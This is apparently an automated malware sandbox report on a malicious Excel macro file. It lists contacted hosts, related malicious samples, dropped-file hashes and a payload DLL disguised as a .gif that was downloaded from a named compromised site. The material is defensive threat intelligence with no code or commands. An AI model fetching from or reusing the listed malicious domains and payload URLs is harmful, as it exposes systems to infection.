                                                                                                                          high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocation7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                            high
                                                                                                                            https://templatelogging.office.com/client/log7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                              high
                                                                                                                              https://outlook.office365.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                high
                                                                                                                                https://webshell.suite.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://management.azure.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://graph.windows.net/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.powerbi.com/beta/myorg/imports7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://devnull.onenote.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ncus.pagecontentsync.7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://messaging.office.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com/v27F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://skyapi.live.net/Activity/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://clients.config.office.net/user/v1.0/mac7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://dataservice.o365filtering.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://api.cortana.ai7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://onedrive.live.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://directory.services.7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown

Contacted IPs


Public

IP               Domain                      Country        ASN     ASN Name                                           Malicious
162.251.80.27    shalombaptistchapel.com     United States  394695  PUBLIC-DOMAIN-REGISTRYUS                           false
67.222.38.97     cesiroinsurance.com         United States  46606   UNIFIEDLAYER-AS-1US                                false
173.201.252.173  innermetransformation.com   United States  26496   AS-26496-GO-DADDY-COM-LLCUS                        false
8.211.4.209      runolfsson-jayde07s.ru.com  Singapore      45102   CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC   false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 384703
Start date: 09.04.2021
Start time: 16:31:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 30s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: documents-1819557117.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLSM@11/14@5/4
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsm
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 40.88.32.150, 13.64.90.137, 104.43.193.48, 23.54.113.53, 168.61.161.212, 52.147.198.201, 52.109.32.63, 52.109.76.36, 52.109.8.23, 95.100.54.203, 13.107.42.23, 13.107.5.88, 93.184.220.29, 51.103.5.159, 20.50.102.62, 23.10.249.26, 23.10.249.43, 93.184.221.240, 20.54.26.129
• Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, ocsp.msocsp.com, fs-wildcard.microsoft.com.edgekey.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, prod-w.nexus.live.com.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, cs11.wpc.v0cdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, config.edge.skype.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, hostedocsp.globalsign.com, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, l-0014.l-msedge.net
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/384703/sample/documents-1819557117.xlsm

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
162.251.80.27 | SecuriteInfo.com.Heur.17834.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | SecuriteInfo.com.Heur.9646.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | SecuriteInfo.com.Heur.17834.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | SecuriteInfo.com.Heur.9646.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-2016732059-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-2016732059-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-1610138277-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-1610138277-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-1361835343-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-1361835343-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
162.251.80.27 | Claim-495018568-02092021.xls | malicious | immanta.com/zrqzfrsvu/3806249.jpg
67.222.38.97 | documents-1819557117.xlsm | malicious |
173.201.252.173 | documents-1819557117.xlsm | malicious |
8.211.4.209 | documents-1819557117.xlsm | malicious | cremin-ian07u.ru.com/ind.html
8.211.4.209 | documents-2112491607.xlsm | malicious | corwin-tommie06f.ru.com/index.html
8.211.4.209 | documents-1660683173.xlsm | malicious | corwin-tommie06f.ru.com/index.html
8.211.4.209 | 1234.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | 12345.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | 1234.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-748443571.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | 12345.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-1887159634.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-748443571.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-1887159634.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-683917632.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-683917632.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-1760163871.xlsm | malicious | mills-skyla30ec.com/gg.gif
8.211.4.209 | documents-1760163871.xlsm | malicious | mills-skyla30ec.com/gg.gif

Domains

Match | Associated Sample Name / URL | Detection | Context
cremin-ian07u.ru.com | documents-1819557117.xlsm | malicious | 8.211.4.209
innermetransformation.com | documents-1819557117.xlsm | malicious | 173.201.252.173
shalombaptistchapel.com | documents-1819557117.xlsm | malicious | 162.251.80.27
api.globalsign.cloud | BvuKqSpgIG.exe | malicious | 104.18.25.243
api.globalsign.cloud | A1GdDOk1aU.exe | malicious | 104.18.25.243
api.globalsign.cloud | Scan05042021.js | malicious | 104.18.24.243
api.globalsign.cloud | 34#U0e15.exe | malicious | 104.18.24.243
api.globalsign.cloud | Sole_AIO_emptyspace_3.exe | malicious | 104.18.25.243
api.globalsign.cloud | v8zOd4jYsG.docx | malicious | 104.18.25.243
api.globalsign.cloud | P_I_Circularpdf.exe | malicious | 104.18.25.243
api.globalsign.cloud | TT Swift Copy.pdf.exe | malicious | 104.18.24.243
api.globalsign.cloud | OUR PO NO. CWI19150.exe | malicious | 104.18.25.243
api.globalsign.cloud | SecuriteInfo.com.W32.AIDetect.malware1.7401.exe | malicious | 104.18.25.243
api.globalsign.cloud | rCWqgWEJLB.exe | malicious | 104.18.24.243
api.globalsign.cloud | ORDER34543REQUEST34444PO.exe | malicious | 104.18.24.243
api.globalsign.cloud | 100400806 SUPPLY.exe | malicious | 104.18.24.243
api.globalsign.cloud | Canada order.vbs | malicious | 104.18.24.243
api.globalsign.cloud | RFQ 17389 MPR 696..exe | malicious | 104.18.25.243
api.globalsign.cloud | YACMsbiUa3.exe | malicious | 104.18.24.243
api.globalsign.cloud | #U260f8284.HTML | malicious | 104.18.25.243
api.globalsign.cloud | DHL Shipment Notification 0012151100.exe | malicious | 104.18.25.243
api.globalsign.cloud | ODJtftTsGl.dll | malicious | 104.18.24.243
api.globalsign.cloud | r2HXquFlQa.exe | malicious | 104.18.25.243
cesiroinsurance.com | documents-1819557117.xlsm | malicious | 67.222.38.97

ASN

Match | Associated Sample Name / URL | Detection | Context
PUBLIC-DOMAIN-REGISTRYUS | documents-1819557117.xlsm | malicious | 162.251.80.27
PUBLIC-DOMAIN-REGISTRYUS | usd 420232.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | P037725600.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | VAT INVOICE.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | VAT INVOICE.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | NEW ORDER.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | TRANSFERENCIA AL EXTERIOR U810295.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | PAYMENT SWIFT COPY MT103.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | UPDATED SOA.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | BANK PAYMENT.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | document-1245492889.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | VAT INVOICE.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | IMG_00000000001.PDF.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | documents-2112491607.xlsm | malicious |
                                                                                                                                                                  • 111.118.215.222
                                                                                                                                                                  FED8GODpaD.xlsbGet hashmaliciousBrowse
                                                                                                                                                                  • 5.100.152.162
                                                                                                                                                                  New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 208.91.199.225
                                                                                                                                                                  document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 199.79.62.99
                                                                                                                                                                  document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  • 199.79.62.99
                                                                                                                                                                  document-1055791644.xlsGet hashmaliciousBrowse
                                                                                                                                                                  • 103.50.162.157
                                                                                                                                                                  catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                  • 5.100.152.162
UNIFIEDLAYER-AS-1 US
AS-26496-GO-DADDY-COM-LLC US

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
37f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif | documents-1819557117.xlsm | malicious
C:\Users\user\ghnrope2.dll | documents-1819557117.xlsm | malicious

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7F71DD77-C2D9-4F65-ACF1-025D1C4A7561
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):133170
                                                                                                                                                                      Entropy (8bit):5.371006409223425
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:6cQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:yVQ9DQW+zTXiJ
                                                                                                                                                                      MD5:47284F10FD58C215804AD06146C2DB1F
                                                                                                                                                                      SHA1:C9D048223A73AA698012103F5FACEFB8C91C9E91
                                                                                                                                                                      SHA-256:242CFF97D9B3EC4DDF04A28111084066A8A4EA95D2239939876050CD1B91D999
                                                                                                                                                                      SHA-512:E56180699854F029FDEC00F55376E643064D5D4E28E404B29D935EEEF86467238F9B23C71AE134B6F426CC1A9D391CE7A8AD638F14EE3E1472DDCEED0B8523BC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-09T14:32:46">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C31A19FB.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                      Entropy (8bit):7.595467031611744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                      MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                      SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                      SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                      SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CD3F03A5.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8301
                                                                                                                                                                      Entropy (8bit):7.970711494690041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                      MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                      SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                      SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                      SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D83053C0.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8854
                                                                                                                                                                      Entropy (8bit):7.949751503848125
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
                                                                                                                                                                      MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
                                                                                                                                                                      SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
                                                                                                                                                                      SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
                                                                                                                                                                      SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E2C3ED62.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):557
                                                                                                                                                                      Entropy (8bit):7.343009301479381
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                      MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                      SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                      SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                      SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):185404
                                                                                                                                                                      Entropy (8bit):6.206741223040736
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
                                                                                                                                                                      MD5:7D7BDC559AE699579A700645D0FD5F03
                                                                                                                                                                      SHA1:C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0
                                                                                                                                                                      SHA-256:0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
                                                                                                                                                                      SHA-512:3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                      Joe Sandbox View: Filename: documents-1819557117.xlsm, Detection: malicious
                                                                                                                                                                      IE Cache URL:https://shalombaptistchapel.com/ds/0604.gif
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\F5A10000
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):97555
                                                                                                                                                                      Entropy (8bit):7.878354858676539
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfn5mw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mf
                                                                                                                                                                      MD5:E4735BE32837B3EFD70C66BB5547CA81
                                                                                                                                                                      SHA1:90748B338652039E32B449C0E35FA43A90A5D0C7
                                                                                                                                                                      SHA-256:5338F8519CE6018CD4EB19F7E2144BEAC3DDF7CE8D440596BEF9B540A1AF26AE
                                                                                                                                                                      SHA-512:ACEBCDC169CF8040B8E6C6184191DFC076F33A90CD29942667D1C7B69F413E26FA51B9AAF033968BD3EEC2BFA79C0777AE7B3A3EF164BDD5538FF73ACB697E33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Fri Apr 9 22:32:48 2021, atime=Fri Apr 9 22:32:48 2021, length=16384, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):909
                                                                                                                                                                      Entropy (8bit):4.695304331247972
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8MpJRUxLv6CHiMGWxeGXADWB+W+jA0/y1bDyZTLkeGLkeM4t2Y+xIBjKZm:8SWkWxP6WqA0KJDyj7aB6m
                                                                                                                                                                      MD5:8F1A3FB730EC3A8F5EC8A158DDE95C94
                                                                                                                                                                      SHA1:F0037E120763C2536758705A1E5235A0848BEF08
                                                                                                                                                                      SHA-256:F04FF42E981BDFFFCB061FF7D090A24F9718CE263FAC27B4938E5C020B579684
                                                                                                                                                                      SHA-512:6CC8C208C4086722A4E664A617A93743E098E4E60A96E90772ACA26BF0C1CD6400076CE6560602E9DCE01199049ABA7A02A9A81429D9AC38E04E44DA467F67A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: L..................F............-.......-.......-...@......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S........................a.l.f.o.n.s.....~.1......R....Desktop.h.......NM..R.......Y..............>.....?l..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......305090...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-1819557117.LNK
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:03 2020, mtime=Fri Apr 9 22:32:48 2021, atime=Fri Apr 9 22:32:48 2021, length=97555, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                      Entropy (8bit):4.738436789765632
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:82kWxP2WiJK96AKKpK9UDyT7aB6my2kWxP2WiJK96AKKpK9UDyT7aB6m:82kW52WiEKKpB6p2kW52WiEKKpB6
                                                                                                                                                                      MD5:7C8FCA6F65C18FA8210897F28E263325
                                                                                                                                                                      SHA1:FC9C467A52B14EB7BAB72604F8BC485ADB129D6C
                                                                                                                                                                      SHA-256:A974DE374090319C6A50CD5E4B2F3EE3C11D311DC43DED69A0A3479671B7A11C
